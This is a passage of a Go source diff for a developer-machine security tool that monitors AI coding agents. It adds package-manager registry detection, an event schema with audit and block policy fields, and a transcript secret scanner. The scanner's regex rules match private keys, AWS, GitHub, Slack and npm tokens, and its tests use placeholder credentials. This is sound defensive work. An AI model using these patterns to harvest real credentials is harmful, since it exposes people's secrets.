confidence: %s", got) + } +} diff --git a/internal/aiagents/enrich/npm/enrich.go b/internal/aiagents/enrich/npm/enrich.go new file mode 100644 index 0000000..cbdf7ba --- /dev/null +++ b/internal/aiagents/enrich/npm/enrich.go @@ -0,0 +1,96 @@ +package npm + +import ( + "context" + "errors" + "os" + "path/filepath" + "strings" + + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/aiagents/redact" +) + +// Enrich runs detection plus light enrichment for the supplied shell command. +// It returns nil when no package manager is detected. The second return reports +// whether the underlying context was cancelled by its deadline. +func Enrich(ctx context.Context, cmd, cwd string) (*event.PackageManagerInfo, bool) { + det := Detect(cmd) + if det == nil { + return nil, false + } + + info := &event.PackageManagerInfo{ + Detected: true, + Name: string(det.Manager), + CommandKind: det.CommandKind, + Confidence: confidence(det.Manager), + } + + if reg, source, ok := Resolve(ctx, string(det.Manager), cwd); ok { + info.Registry = reg + info.Evidence = append(info.Evidence, string(source)) + if source == SourceNPM { + info.ConfigSources = npmConfigSources(ctx, cwd) + } + } + addLockfileEvidence(info, det.Manager, cwd) + + if isCtxCanceled(ctx) { + return info, true + } + return info, false +} + +func addLockfileEvidence(info *event.PackageManagerInfo, m Manager, cwd string) { + if cwd == "" { + return + } + pairs := []struct { + mgr Manager + file string + }{ + {NPM, "package-lock.json"}, + {PNPM, "pnpm-lock.yaml"}, + {Yarn, "yarn.lock"}, + {Bun, "bun.lockb"}, + {Bun, "bun.lock"}, + } + for _, p := range pairs { + if p.mgr != m { + continue + } + if _, err := os.Stat(filepath.Join(cwd, p.file)); err == nil { + info.Evidence = append(info.Evidence, p.file) + } + } +} + +func npmConfigSources(ctx context.Context, cwd string) []string { + out, err := runFunc(ctx, cwd, "npm", "config", "ls", "-l") + if err != nil || out == "" { + return nil + } + var sources []string + for _, line := range strings.Split(out, "\n") { + line = strings.TrimSpace(line) + if !strings.HasPrefix(line, "; ") || !strings.Contains(line, "config from ") { + continue + } + idx := strings.Index(line, "config from ") + path := strings.Trim(line[idx+len("config from "):], `"' `) + if path != "" { + sources = append(sources, redact.String(path)) + } + } + return sources +} + +func isCtxCanceled(ctx context.Context) bool { + select { + case <-ctx.Done(): + return errors.Is(ctx.Err(), context.DeadlineExceeded) + default: + return false + } +} diff --git a/internal/aiagents/enrich/npm/enrich_test.go b/internal/aiagents/enrich/npm/enrich_test.go new file mode 100644 index 0000000..625189c --- /dev/null +++ b/internal/aiagents/enrich/npm/enrich_test.go @@ -0,0 +1,38 @@ +package npm + +import ( + "context" + "strings" + "testing" +) + +func TestEnrichCapturesNPMRegistryAndConfigSources(t *testing.T) { + if !canLookPath("npm") { + t.Skip("npm not on PATH") + } + stubRun(t, func(_ context.Context, _, _ string, args ...string) (string, error) { + joined := strings.Join(args, " ") + switch joined { + case "config get registry": + return "https://registry.npmjs.org/\n", nil + case "config ls -l": + return "; project config from /tmp/project/.npmrc\n", nil + } + return "", nil + }) + + info, timedOut := Enrich(context.Background(), "npm install lodash", "") + + if timedOut { + t.Fatal("unexpected timeout") + } + if info == nil { + t.Fatal("expected package manager info") + } + if info.Registry != "https://registry.npmjs.org/" { + t.Errorf("registry: %q", info.Registry) + } + if len(info.ConfigSources) != 1 || info.ConfigSources[0] != "/tmp/project/.npmrc" { + t.Errorf("config sources: %v", info.ConfigSources) + } +} diff --git a/internal/aiagents/enrich/npm/registry.go b/internal/aiagents/enrich/npm/registry.go new file mode 100644 index 0000000..7c3b8b8 --- /dev/null +++ b/internal/aiagents/enrich/npm/registry.go @@ -0,0 +1,115 @@ +package npm + +import ( + "context" + "errors" + "os" + "os/exec" + "path/filepath" + "strings" +) + +// Source identifies which command produced the resolution. Empty when +// resolution failed. +type Source string + +const ( + SourceNPM Source = "npm config get registry" + SourcePNPM Source = "pnpm config get registry" + SourceYarnV2 Source = "yarn config get npmRegistryServer" + SourceYarnV1 Source = "yarn config get registry" + SourceBun Source = "bun pm config get registry" +) + +var runFunc = execRun + +func execRun(ctx context.Context, cwd, bin string, args ...string) (string, error) { + cmd := exec.CommandContext(ctx, bin, args...) + if cwd != "" { + cmd.Dir = cwd + } + cmd.Env = []string{ + "PATH=" + os.Getenv("PATH"), + "HOME=" + os.Getenv("HOME"), + } + out, err := cmd.Output() + if err != nil { + if errors.Is(ctx.Err(), context.DeadlineExceeded) || errors.Is(ctx.Err(), context.Canceled) { + return "", ctx.Err() + } + return "", err + } + return string(out), nil +} + +// Resolve returns the effective registry URL for pm rooted at cwd. ok=false on +// failure; callers should treat that as data unavailable, not as a verdict. +func Resolve(ctx context.Context, pm, cwd string) (registry string, source Source, ok bool) { + switch pm { + case "npm", "npx": + return resolveSimple(ctx, cwd, "npm", []string{"config", "get", "registry"}, SourceNPM) + case "pnpm", "pnpx": + return resolveSimple(ctx, cwd, "pnpm", []string{"config", "get", "registry"}, SourcePNPM) + case "yarn": + return resolveYarn(ctx, cwd) + case "bun", "bunx": + return resolveSimple(ctx, cwd, "bun", []string{"pm", "config", "get", "registry"}, SourceBun) + } + return "", "", false +} + +func resolveSimple(ctx context.Context, cwd, bin string, args []string, src Source) (string, Source, bool) { + if _, err := exec.LookPath(bin); err != nil { + return "", "", false + } + out, err := runFunc(ctx, cwd, bin, args...) + if err != nil { + return "", "", false + } + v := strings.TrimSpace(out) + if v == "" || v == "undefined" { + return "", "", false + } + return v, src, true +} + +func resolveYarn(ctx context.Context, cwd string) (string, Source, bool) { + if _, err := exec.LookPath("yarn"); err != nil { + return "", "", false + } + if isYarnBerry(cwd) { + out, err := runFunc(ctx, cwd, "yarn", "config", "get", "npmRegistryServer") + if err == nil { + if v := strings.TrimSpace(out); v != "" && v != "undefined" { + return v, SourceYarnV2, true + } + } + return "", "", false + } + out, err := runFunc(ctx, cwd, "yarn", "config", "get", "registry") + if err != nil { + return "", "", false + } + v := strings.TrimSpace(out) + if v == "" || v == "undefined" { + return "", "", false + } + return v, SourceYarnV1, true +} + +func isYarnBerry(cwd string) bool { + if cwd == "" { + return false + } + dir := cwd + for { + if _, err := os.Stat(filepath.Join(dir, ".yarnrc.yml")); err == nil { + return true + } + parent := filepath.Dir(dir) + if parent == dir { + return false + } + dir = parent + } +} diff --git a/internal/aiagents/enrich/npm/registry_test.go b/internal/aiagents/enrich/npm/registry_test.go new file mode 100644 index 0000000..32ec696 --- /dev/null +++ b/internal/aiagents/enrich/npm/registry_test.go @@ -0,0 +1,87 @@ +package npm + +import ( + "context" + "errors" + "os" + "os/exec" + "path/filepath" + "testing" +) + +func stubRun(t *testing.T, fn func(ctx context.Context, cwd, bin string, args ...string) (string, error)) { + t.Helper() + orig := runFunc + runFunc = fn + t.Cleanup(func() { runFunc = orig }) +} + +func TestResolveUnknownManagerReturnsNotOK(t *testing.T) { + _, _, ok := Resolve(context.Background(), "cargo", "") + if ok { + t.Errorf("expected ok=false for unknown pm") + } +} + +func TestResolveNPMTrimsWhitespace(t *testing.T) { + stubRun(t, func(_ context.Context, _, _ string, _ ...string) (string, error) { + return "https://registry.npmjs.org/\n", nil + }) + if !canLookPath("npm") { + t.Skip("npm not on PATH; LookPath gate would block stub") + } + got, src, ok := Resolve(context.Background(), "npm", "") + if !ok { + t.Fatal("expected ok") + } + if got != "https://registry.npmjs.org/" { + t.Errorf("registry: %q", got) + } + if src != SourceNPM { + t.Errorf("source: %s", src) + } +} + +func TestResolveYarnDetectsBerry(t *testing.T) { + dir := t.TempDir() + if err := os.WriteFile(filepath.Join(dir, ".yarnrc.yml"), []byte(""), 0o600); err != nil { + t.Fatal(err) + } + if !isYarnBerry(dir) { + t.Errorf("expected Berry detection in %s", dir) + } + if isYarnBerry(t.TempDir()) { + t.Errorf("expected non-Berry in empty dir") + } +} + +func TestResolveTreatsUndefinedAsMissing(t *testing.T) { + if !canLookPath("npm") { + t.Skip("npm not on PATH") + } + stubRun(t, func(_ context.Context, _, _ string, _ ...string) (string, error) { + return "undefined\n", nil + }) + _, _, ok := Resolve(context.Background(), "npm", "") + if ok { + t.Errorf("expected ok=false on 'undefined'") + } +} + +func TestResolvePropagatesRunError(t *testing.T) { + if !canLookPath("npm") { + t.Skip("npm not on PATH") + } + stubRun(t, func(_ context.Context, _, _ string, _ ...string) (string, error) { + return "", errors.New("boom") + }) + _, _, ok := Resolve(context.Background(), "npm", "") + if ok { + t.Errorf("expected ok=false on run error") + } +} + +func canLookPath(bin string) bool { + _, err := exec.LookPath(bin) + return err == nil +} diff --git a/internal/aiagents/enrich/secrets/rules.go b/internal/aiagents/enrich/secrets/rules.go new file mode 100644 index 0000000..7129bf8 --- /dev/null +++ b/internal/aiagents/enrich/secrets/rules.go @@ -0,0 +1,83 @@ +// Package secrets implements a self-contained transcript secret scanner. +// It is intentionally small: detection runs in-process with no external +// scanner binary. +package secrets + +import ( + "crypto/sha256" + "encoding/hex" + "regexp" + "strings" +) + +// rule is one detection rule. Group selects which submatch to fingerprint; +// 0 means the entire match. +type rule struct { + ID string + RE *regexp.Regexp + Group int + Confidence string +} + +var rules = []rule{ + { + ID: "private_key_block", + RE: regexp.MustCompile(`(?s)-----BEGIN[ A-Z]*PRIVATE KEY-----.*?-----END[ A-Z]*PRIVATE KEY-----`), + Confidence: "high", + }, + { + ID: "aws_access_key_id", + RE: regexp.MustCompile(`\b(?:AKIA|ASIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ABIA|ACCA)[0-9A-Z]{16}\b`), + Confidence: "high", + }, + { + ID: "aws_secret_access_key", + RE: regexp.MustCompile(`(?i)aws_secret_access_key\s*[:=]\s*"?([A-Za-z0-9/+=]{30,})`), + Group: 1, + Confidence: "medium", + }, + { + ID: "github_token", + RE: regexp.MustCompile(`\bgh[pousr]_[A-Za-z0-9]{16,}\b`), + Confidence: "high", + }, + { + ID: "slack_token", + RE: regexp.MustCompile(`\bxox[abprs]-[A-Za-z0-9-]{10,}\b`), + Confidence: "high", + }, + { + ID: "bearer_token", + RE: regexp.MustCompile(`(?i)authorization\s*[:=]\s*"?\s*bearer\s+([A-Za-z0-9._\-+/=]{16,})`), + Group: 1, + Confidence: "medium", + }, + { + ID: "npm_auth_token", + RE: regexp.MustCompile(`(?i)_authToken\s*=\s*([^\s"]+)`), + Group: 1, + Confidence: "high", + }, + { + ID: "generic_api_key", + RE: regexp.MustCompile(`(?i)\b(?:api[_-]?key|apikey)\s*[:=]\s*["']?([A-Za-z0-9_\-]{20,})`), + Group: 1, + Confidence: "low", + }, +} + +// fingerprint returns a stable hash for a secret value, suitable for +// dedup/correlation without storing the value itself. +func fingerprint(secret string) string { + h := sha256.Sum256([]byte(secret)) + // 12 bytes / 24 hex chars is plenty for de-duplication. + return hex.EncodeToString(h[:12]) +} + +// mask collapses the middle of a secret so previews carry no usable bytes. +func mask(secret string) string { + if len(secret) <= 8 { + return strings.Repeat("*", len(secret)) + } + return secret[:2] + strings.Repeat("*", len(secret)-4) + secret[len(secret)-2:] +} diff --git a/internal/aiagents/enrich/secrets/scanner.go b/internal/aiagents/enrich/secrets/scanner.go new file mode 100644 index 0000000..058caf6 --- /dev/null +++ b/internal/aiagents/enrich/secrets/scanner.go @@ -0,0 +1,120 @@ +package secrets + +import ( + "context" + "errors" + "io" + "os" + + "github.com/step-security/dev-machine-guard/internal/aiagents/event" +) + +// MaxFileBytes caps how much of any single file we load. Transcripts can +// grow large; we cap at 16 MiB per file to keep scanning bounded. +const MaxFileBytes int64 = 16 * 1024 * 1024 + +// ScanTranscript scans path for likely secrets and returns redacted +// findings. The returned bool reports whether ctx was cancelled (timeout). +// +// We read the whole bounded buffer once so multi-line patterns (PEM blocks) +// match correctly. Line numbers are recovered by counting newlines up to +// each match offset. +func ScanTranscript(ctx context.Context, path string) (*event.SecretsScanInfo, bool) { + if path == "" { + return nil, false + } + f, err := os.Open(path) + if err != nil { + return nil, false + } + defer f.Close() + + st, err := f.Stat() + if err != nil { + return nil, false + } + + limit := st.Size() + if limit > MaxFileBytes { + limit = MaxFileBytes + } + buf, err := io.ReadAll(io.LimitReader(f, limit)) + if err != nil && !errors.Is(err, io.EOF) { + return nil, false + } + + info := &event.SecretsScanInfo{Scanned: true, FilesSeen: 1, BytesSeen: int64(len(buf))} + if ctx.Err() != nil { + info.TimedOut = errors.Is(ctx.Err(), context.DeadlineExceeded) + return info, info.TimedOut + } + + text := string(buf) + seenFP := map[string]struct{}{} + + for _, r := range rules { + if ctx.Err() != nil { + info.TimedOut = errors.Is(ctx.Err(), context.DeadlineExceeded) + return info, info.TimedOut + } + matches := r.RE.FindAllStringSubmatchIndex(text, -1) + for _, m := range matches { + value := extract(text, m, r.Group) + if value == "" { + continue + } + fp := fingerprint(value) + if _, dup := seenFP[fp]; dup { + continue + } + seenFP[fp] = struct{}{} + startLine, endLine := lineRange(text, m[0], m[1]) + info.Findings = append(info.Findings, event.SecretFinding{ + RuleID: r.ID, + FilePath: path, + LineStart: startLine, + LineEnd: endLine, + Fingerprint: fp, + MaskedPreview: mask(value), + Confidence: r.Confidence, + }) + } + } + return info, info.TimedOut +} + +func extract(s string, indices []int, group int) string { + if group == 0 { + if len(indices) < 2 { + return "" + } + return s[indices[0]:indices[1]] + } + if len(indices) < 2*(group+1) { + return "" + } + start := indices[2*group] + end := indices[2*group+1] + if start < 0 || end < 0 || start >= end || end > len(s) { + return "" + } + return s[start:end] +} + +// lineRange returns the 1-indexed line numbers for byte offsets [start, end) +// in s. Both are inclusive in the returned [startLine, endLine] range. +func lineRange(s string, start, end int) (int, int) { + startLine := 1 + for i := 0; i < start && i < len(s); i++ { + if s[i] == '\n' { + startLine++ + } + } + endLine := startLine + for i := start; i < end && i < len(s); i++ { + if s[i] == '\n' { + endLine++ + } + } + return startLine, endLine +} diff --git a/internal/aiagents/enrich/secrets/scanner_test.go b/internal/aiagents/enrich/secrets/scanner_test.go new file mode 100644 index 0000000..8430c09 --- /dev/null +++ b/internal/aiagents/enrich/secrets/scanner_test.go @@ -0,0 +1,74 @@ +package secrets + +import ( + "context" + "os" + "path/filepath" + "strings" + "testing" +) + +func TestScanTranscriptFindsKnownSecrets(t *testing.T) { + dir := t.TempDir() + path := filepath.Join(dir, "transcript.txt") + body := strings.Join([]string{ + "hello world", + "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY", + "AKIAIOSFODNN7EXAMPLE", + "ghp_abcdefghijklmnopqrstuvwxyz0123456789", + "_authToken=npm_xyz1234567890", + "-----BEGIN RSA PRIVATE KEY-----", + "MIIBOgIBAAJBAKj", + "-----END RSA PRIVATE KEY-----", + }, "\n") + if err := os.WriteFile(path, []byte(body), 0o600); err != nil { + t.Fatal(err) + } + info, _ := ScanTranscript(context.Background(), path) + if info == nil || !info.Scanned { + t.Fatal("expected scan result") + } + rules := map[string]bool{} + for _, f := range info.Findings { + rules[f.RuleID] = true + // Findings must never carry the raw value. + if strings.Contains(f.MaskedPreview, "wJalrXUtnFEMI/K7MDENG") { + t.Errorf("masked preview leaks secret: %q", f.MaskedPreview) + } + if f.Fingerprint == "" { + t.Errorf("missing fingerprint for %s", f.RuleID) + } + } + for _, want := range []string{"aws_access_key_id", "aws_secret_access_key", "github_token", "npm_auth_token", "private_key_block"} { + if !rules[want] { + t.Errorf("expected rule %q to fire; got %v", want, rules) + } + } +} + +func TestScanTranscriptDeduplicatesByFingerprint(t *testing.T) { + dir := t.TempDir() + path := filepath.Join(dir, "transcript.txt") + line := "ghp_abcdefghijklmnopqrstuvwxyz0123456789\n" + body := strings.Repeat(line, 10) + if err := os.WriteFile(path, []byte(body), 0o600); err != nil { + t.Fatal(err) + } + info, _ := ScanTranscript(context.Background(), path) + hits := 0 + for _, f := range info.Findings { + if f.RuleID == "github_token" { + hits++ + } + } + if hits != 1 { + t.Fatalf("expected dedup to leave 1 github_token finding, got %d", hits) + } +} + +func TestScanTranscriptMissingFileNoError(t *testing.T) { + info, timedOut := ScanTranscript(context.Background(), "/nonexistent/transcript.txt") + if info != nil || timedOut { + t.Fatalf("expected nil result for missing file, got %+v timedOut=%v", info, timedOut) + } +} diff --git a/internal/aiagents/event/event.go b/internal/aiagents/event/event.go new file mode 100644 index 0000000..930b687 --- /dev/null +++ b/internal/aiagents/event/event.go @@ -0,0 +1,274 @@ +// Package event defines the canonical AI-agent event schema. Adapters +// produce *Event from agent-piped stdin payloads; the hook runtime +// enriches and emits to telemetry. Every record carries an explicit +// schema_version so downstream consumers can detect format drift. +// +// SchemaVersion is "dmg.hook.event/v1". The constant lives here rather +// than in a separate version package because it is the schema's own +// identity, not a build-info concern. +package event + +import ( + "crypto/rand" + "encoding/hex" + "time" +) + +// SchemaVersion identifies this event schema on the wire and in +// telemetry. Every Event written or uploaded carries this value in its +// SchemaVersion field. Bumping requires a coordinated backend change. +const SchemaVersion = "dmg.hook.event/v1" + +// ActionType enumerates the kinds of activity the runtime can observe. +// It applies only to tool-bearing hook events (PreToolUse, PostToolUse, +// PostToolUseFailure). Lifecycle hooks (SessionStart, SessionEnd, +// Notification, Stop, SubagentStop, UserPromptSubmit, Elicitation, +// ElicitationResult, PermissionRequest, PermissionDenied) leave +// action_type unset — the hook_event field already names the +// lifecycle phase, and permission events describe a decision around a +// tool call rather than a tool call itself. +type ActionType string + +const ( + ActionFileRead ActionType = "file_read" + ActionFileWrite ActionType = "file_write" + ActionFileDelete ActionType = "file_delete" + ActionCommandExec ActionType = "command_exec" + ActionNetworkRequest ActionType = "network_request" + ActionToolUse ActionType = "tool_use" + ActionMCPInvocation ActionType = "mcp_invocation" +) + +// ResultStatus describes the recorded outcome. +type ResultStatus string + +const ( + ResultObserved ResultStatus = "observed" + ResultSuccess ResultStatus = "success" + ResultError ResultStatus = "error" + ResultTimeout ResultStatus = "timeout" + ResultPartial ResultStatus = "partial" +) + +// HookEvent is the native, agent-owned label for a hook lifecycle event. +// The string value is whatever the originating agent wrote on the wire — +// PreToolUse for Claude Code today, but tool.execute.before or +// pre_run_command for future adapters. It is NOT a global enum of every +// hook the runtime supports; the supported set lives behind each +// adapter's SupportedHooks() method. +// +// Constants below are convenience values for Claude Code, kept here so +// adapter and runtime code can refer to them by name without a separate +// adapter import. New adapters should define their own native constants +// in their own packages rather than adding to this list. +type HookEvent string + +const ( + HookPreToolUse HookEvent = "PreToolUse" + HookPostToolUse HookEvent = "PostToolUse" + HookPostToolUseFailure HookEvent = "PostToolUseFailure" + HookSessionStart HookEvent = "SessionStart" + HookSessionEnd HookEvent = "SessionEnd" + HookNotification HookEvent = "Notification" + HookStop HookEvent = "Stop" + HookSubagentStop HookEvent = "SubagentStop" + HookUserPrompt HookEvent = "UserPromptSubmit" + HookElicitation HookEvent = "Elicitation" + HookElicitationResult HookEvent = "ElicitationResult" + HookPermissionRequest HookEvent = "PermissionRequest" + HookPermissionDenied HookEvent = "PermissionDenied" +) + +// HookPhase is the normalized lifecycle classification of a hook event, +// independent of the originating agent. Adapters populate this alongside +// the native HookEvent. Policy and other cross-agent consumers should +// branch on HookPhase, never on a native HookEvent value. +type HookPhase string + +const ( + HookPhaseUnknown HookPhase = "unknown" + HookPhasePreTool HookPhase = "pre_tool" + HookPhasePostTool HookPhase = "post_tool" + HookPhasePostToolFailure HookPhase = "post_tool_failure" + HookPhasePermissionRequest HookPhase = "permission_request" + HookPhasePermissionDenied HookPhase = "permission_denied" + HookPhaseElicitation HookPhase = "elicitation" + HookPhaseElicitationResult HookPhase = "elicitation_result" + HookPhaseUserPrompt HookPhase = "user_prompt" + HookPhaseSessionStart HookPhase = "session_start" + HookPhaseSessionEnd HookPhase = "session_end" + HookPhaseNotification HookPhase = "notification" + HookPhaseStop HookPhase = "stop" + HookPhaseSubagentStop HookPhase = "subagent_stop" +) + +// Event is the canonical AI-agent event record. JSON keys match the +// upload wire format. Optional fields use omitempty so absent data stays +// out of records. +type Event struct { + SchemaVersion string `json:"schema_version"` + EventID string `json:"event_id"` + Timestamp time.Time `json:"timestamp"` + AgentName string `json:"agent_name"` + AgentVersion string `json:"agent_version,omitempty"` + HookEvent HookEvent `json:"hook_event"` + HookPhase HookPhase `json:"hook_phase,omitempty"` + SessionID string `json:"session_id,omitempty"` + WorkingDirectory string `json:"working_directory,omitempty"` + PermissionMode string `json:"permission_mode,omitempty"` + CustomerID string `json:"customer_id,omitempty"` + UserIdentity string `json:"user_identity,omitempty"` + DeviceID string `json:"device_id,omitempty"` + ActionType ActionType `json:"action_type,omitempty"` + ToolName string `json:"tool_name,omitempty"` + ToolUseID string `json:"tool_use_id,omitempty"` + ResultStatus ResultStatus `json:"result_status"` + IsSensitive bool `json:"is_sensitive,omitempty"` + Payload map[string]any `json:"payload,omitempty"` + Classifications *Classifications `json:"classifications,omitempty"` + Enrichments *Enrichments `json:"enrichments,omitempty"` + Timeouts []TimeoutInfo `json:"timeouts,omitempty"` + Errors []ErrorInfo `json:"errors,omitempty"` + PolicyDecision *PolicyDecisionInfo `json:"policy_decision,omitempty"` +} + +// PolicyDecisionInfo carries the full audit-side detail of a policy +// evaluation. The agent only sees a generic block message; this struct +// is the complete answer to "what did the runtime decide and why" in +// telemetry. +// +// Allowed records what the endpoint actually returned to the agent — it +// is the effective decision, not the policy verdict. WouldBlock captures +// the policy verdict; Enforced records whether the endpoint acted on it. +// +// Truth table: +// +// mode=audit, no violation → Allowed=true, WouldBlock=false, Enforced=false +// mode=audit, violation → Allowed=true, WouldBlock=true, Enforced=false +// mode=block, no violation → Allowed=true, WouldBlock=false, Enforced=false +// mode=block, violation → Allowed=false, WouldBlock=true, Enforced=true +// +// dev-machine-guard currently runs audit-only, so Enforced is always +// false on shipped builds. +type PolicyDecisionInfo struct { + Mode string `json:"mode,omitempty"` // audit | block + Allowed bool `json:"allowed"` + WouldBlock bool `json:"would_block,omitempty"` + Enforced bool `json:"enforced,omitempty"` + Code string `json:"code,omitempty"` + InternalDetail string `json:"internal_detail,omitempty"` + Registry string `json:"registry,omitempty"` + AllowlistHit bool `json:"allowlist_hit"` + Bypass string `json:"bypass,omitempty"` // "registry_flag" | "env_var" | "config_set" | "config_edit" | "userconfig_flag" +} + +// Classifications carries top-level activity tags used by the audit pipeline. +type Classifications struct { + IsShellCommand bool `json:"is_shell_command,omitempty"` + IsPackageManager bool `json:"is_package_manager,omitempty"` + IsMCPRelated bool `json:"is_mcp_related,omitempty"` + IsFileOperation bool `json:"is_file_operation,omitempty"` + IsNetworkActivity bool `json:"is_network_activity,omitempty"` +} + +// IsZero reports whether no classification is set. +func (c Classifications) IsZero() bool { + return c == (Classifications{}) +} + +// Enrichments holds optional, bounded enrichment payloads. +type Enrichments struct { + Shell *ShellEnrichment `json:"shell,omitempty"` + PackageManager *PackageManagerInfo `json:"package_manager,omitempty"` + MCP *MCPInfo `json:"mcp,omitempty"` + Secrets *SecretsScanInfo `json:"secrets,omitempty"` +} + +// ShellEnrichment captures redacted shell-command context. +type ShellEnrichment struct { + Command string `json:"command,omitempty"` + CommandTruncated bool `json:"command_truncated,omitempty"` + WorkingDirectory string `json:"working_directory,omitempty"` +} + +// PackageManagerInfo records detection + diff results from a shell event. +type PackageManagerInfo struct { + Detected bool `json:"detected"` + Name string `json:"name,omitempty"` + CommandKind string `json:"command_kind,omitempty"` + Registry string `json:"registry,omitempty"` + ConfigSources []string `json:"config_sources,omitempty"` + PackagesAdded []PackageRef `json:"packages_added,omitempty"` + PackagesRemoved []PackageRef `json:"packages_removed,omitempty"` + PackagesChanged []PackageRef `json:"packages_changed,omitempty"` + Confidence string `json:"confidence,omitempty"` + Evidence []string `json:"evidence,omitempty"` +} + +// PackageRef is one package version reference in a diff. +type PackageRef struct { + Name string `json:"name"` + Version string `json:"version,omitempty"` +} + +// MCPInfo carries the non-derivable facts produced by parsing a +// shell-launched MCP server invocation. It is emitted ONLY when the +// shell command itself is the only signal that an MCP server is in +// play (e.g. `npx -y @modelcontextprotocol/server-foo` under a Bash +// tool call). Direct mcp____ tool events, MCP permission +// events, and Elicitation hooks already carry the server identity in +// top-level fields or the payload, so they emit no MCPInfo block. +type MCPInfo struct { + Kind string `json:"kind,omitempty"` // local | unknown + ServerName string `json:"server_name,omitempty"` // parsed from package or command + ServerCommand string `json:"server_command,omitempty"` // redacted, capped +} + +// SecretsScanInfo summarizes session-end transcript scanning. +type SecretsScanInfo struct { + Scanned bool `json:"scanned"` + FilesSeen int `json:"files_seen"` + BytesSeen int64 `json:"bytes_seen"` + Findings []SecretFinding `json:"findings,omitempty"` + TimedOut bool `json:"timed_out,omitempty"` +} + +// SecretFinding is one redacted scanner hit. Full secret values are never +// stored; only a fingerprint and a masked preview. +type SecretFinding struct { + RuleID string `json:"rule_id"` + FilePath string `json:"file_path,omitempty"` + LineStart int `json:"line_start,omitempty"` + LineEnd int `json:"line_end,omitempty"` + Fingerprint string `json:"fingerprint,omitempty"` + MaskedPreview string `json:"masked_preview,omitempty"` + Confidence string `json:"confidence,omitempty"` +} + +// TimeoutInfo records that an enrichment hit its cap. +type TimeoutInfo struct { + Stage string `json:"stage"` + Cap time.Duration `json:"cap_ns"` + Elapsed time.Duration `json:"elapsed_ns"` +} + +// ErrorInfo records a non-fatal internal error tied to this event. +type ErrorInfo struct { + Stage string `json:"stage"` + Code string `json:"code"` + Message string `json:"message,omitempty"` +} + +// NewEventID returns a 128-bit random hex identifier. +func NewEventID() string { + var b [16]byte + if _, err := rand.Read(b[:]); err != nil { + // crypto/rand failures are vanishingly rare on any supported OS; + // fall back to a timestamp-derived id rather than failing the hook. + ts := time.Now().UnixNano() + for i := range 8 { + b[i] = byte(ts >> (8 * i)) + } + } + return hex.EncodeToString(b[:]) +} diff --git a/internal/aiagents/event/event_test.go b/internal/aiagents/event/event_test.go new file mode 100644 index 0000000..86bbf6d --- /dev/null +++ b/internal/aiagents/event/event_test.go @@ -0,0 +1,444 @@ +package event_test + +import ( + "encoding/json" + "reflect" + "strings" + "testing" + "time" + + "github.com/step-security/dev-machine-guard/internal/aiagents/event" +) + +func TestSchemaVersionIsDMGHookEventV1(t *testing.T) { + // schema_version is "dmg.hook.event/v1". The backend strict-matches; + // bumping requires a coordinated change. + if event.SchemaVersion != "dmg.hook.event/v1" { + t.Errorf("SchemaVersion = %q, want dmg.hook.event/v1", event.SchemaVersion) + } +} + +func TestNewEventIDIs128BitHex(t *testing.T) { + id := event.NewEventID() + if len(id) != 32 { + t.Errorf("NewEventID len = %d, want 32 (16 bytes hex)", len(id)) + } + for _, c := range id { + ok := (c >= '0' && c <= '9') || (c >= 'a' && c <= 'f') + if !ok { + t.Errorf("NewEventID contains non-hex byte %q in %q", c, id) + break + } + } +} + +func TestNewEventIDIsUnique(t *testing.T) { + seen := make(map[string]struct{}, 1024) + for i := range 1024 { + id := event.NewEventID() + if _, dup := seen[id]; dup { + t.Fatalf("NewEventID collision after %d draws: %s", i, id) + } + seen[id] = struct{}{} + } +} + +func TestEventJSONOmitsEmptyFields(t *testing.T) { + ev := &event.Event{ + SchemaVersion: event.SchemaVersion, + EventID: "abcd", + Timestamp: time.Date(2026, 5, 5, 12, 0, 0, 0, time.UTC), + AgentName: "claude-code", + HookEvent: event.HookPreToolUse, + ResultStatus: event.ResultObserved, + } + out, err := json.Marshal(ev) + if err != nil { + t.Fatal(err) + } + got := string(out) + // Optional fields must be elided. + for _, banned := range []string{ + "agent_version", "session_id", "permission_mode", "customer_id", + "user_identity", "device_id", "action_type", "tool_name", + "tool_use_id", "is_sensitive", "payload", "classifications", + "enrichments", "timeouts", "errors", "policy_decision", + } { + if strings.Contains(got, `"`+banned+`"`) { + t.Errorf("expected %q to be omitted from empty event, got %s", banned, got) + } + } + // schema_version, event_id, agent_name, hook_event, result_status + // are always present. + for _, want := range []string{ + `"schema_version":"dmg.hook.event/v1"`, + `"event_id":"abcd"`, + `"agent_name":"claude-code"`, + `"hook_event":"PreToolUse"`, + `"result_status":"observed"`, + } { + if !strings.Contains(got, want) { + t.Errorf("expected output to contain %s, got %s", want, got) + } + } +} + +func TestClassificationsIsZero(t *testing.T) { + var c event.Classifications + if !c.IsZero() { + t.Error("zero Classifications should report IsZero=true") + } + c.IsShellCommand = true + if c.IsZero() { + t.Error("non-zero Classifications should report IsZero=false") + } +} + +func TestEnumWireValues(t *testing.T) { + // Every enum string is part of the wire format. The backend + // strict-matches; renaming a constant is a coordinated migration, + // not a refactor. This test pins the literals so a casual rename + // fails CI loudly rather than silently breaking telemetry. + cases := map[string]string{ + // ActionType + "ActionFileRead": string(event.ActionFileRead), + "ActionFileWrite": string(event.ActionFileWrite), + "ActionFileDelete": string(event.ActionFileDelete), + "ActionCommandExec": string(event.ActionCommandExec), + "ActionNetworkRequest": string(event.ActionNetworkRequest), + "ActionToolUse": string(event.ActionToolUse), + "ActionMCPInvocation": string(event.ActionMCPInvocation), + // ResultStatus + "ResultObserved": string(event.ResultObserved), + "ResultSuccess": string(event.ResultSuccess), + "ResultError": string(event.ResultError), + "ResultTimeout": string(event.ResultTimeout), + "ResultPartial": string(event.ResultPartial), + // HookEvent (Claude Code natives) + "HookPreToolUse": string(event.HookPreToolUse), + "HookPostToolUse": string(event.HookPostToolUse), + "HookPostToolUseFailure": string(event.HookPostToolUseFailure), + "HookSessionStart": string(event.HookSessionStart), + "HookSessionEnd": string(event.HookSessionEnd), + "HookNotification": string(event.HookNotification), + "HookStop": string(event.HookStop), + "HookSubagentStop": string(event.HookSubagentStop), + "HookUserPrompt": string(event.HookUserPrompt), + "HookElicitation": string(event.HookElicitation), + "HookElicitationResult": string(event.HookElicitationResult), + "HookPermissionRequest": string(event.HookPermissionRequest), + "HookPermissionDenied": string(event.HookPermissionDenied), + // HookPhase + "HookPhaseUnknown": string(event.HookPhaseUnknown), + "HookPhasePreTool": string(event.HookPhasePreTool), + "HookPhasePostTool": 